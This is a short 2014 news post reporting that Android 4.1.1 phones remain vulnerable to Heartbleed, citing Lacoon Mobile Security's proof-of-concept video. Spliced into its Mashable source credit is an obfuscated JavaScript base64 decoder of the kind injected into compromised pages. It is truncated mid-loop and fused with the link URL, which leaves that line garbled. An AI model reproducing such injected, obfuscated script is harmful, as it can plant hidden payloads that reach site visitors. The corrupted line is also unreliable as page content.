Hit Me Back


Heartbleed Attacks Are Completely Undetectable on Old Android OS

David Smothers May 1, 2014

Heartbleed Attacks Android OS


It’s still an open wound.

Three weeks after most of the Web protected its computers from the Heartbleed Internet bug, there are lingering threats. Many smartphones running an older version of Google’s Android software may still be vulnerable to hacking attacks.

As we’ve reported, millions of devices globally using Android version 4.1.1, which was released in 2012, carry the Heartbleed flaw. And while Google has “applied patches to key Google services,” according to the company, individual wireless carriers and handset makers still need to push out the fix.

That can be a "really long process," said Michael Shaulov, chief executive officer and co-founder of Lacoon Mobile Security. So to create an even greater sense of urgency, his company produced a video showing what an attack against the devices would look like.

Shaulov said the point is to show the ease with which vulnerable devices can be exploited and refute suggestions that attacks would be impractical. The video shows pages of data pulled from a target phone's memory spilling onto the screen, exposing passwords and other sensitive information — precisely what the "bleed" in Heartbleed refers to.

Bleeding In The Browser - Reverse Heartbleed Exploit on Mobile Proof of Concept

[via function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oaandroid-lacoon-mobile-security/" target="_blank">mashable]

Register for an account it’s free to participate in the discussion or share your thoughts in the Facebook.

Login to your account

Can't remember your Password ?

Register for this site!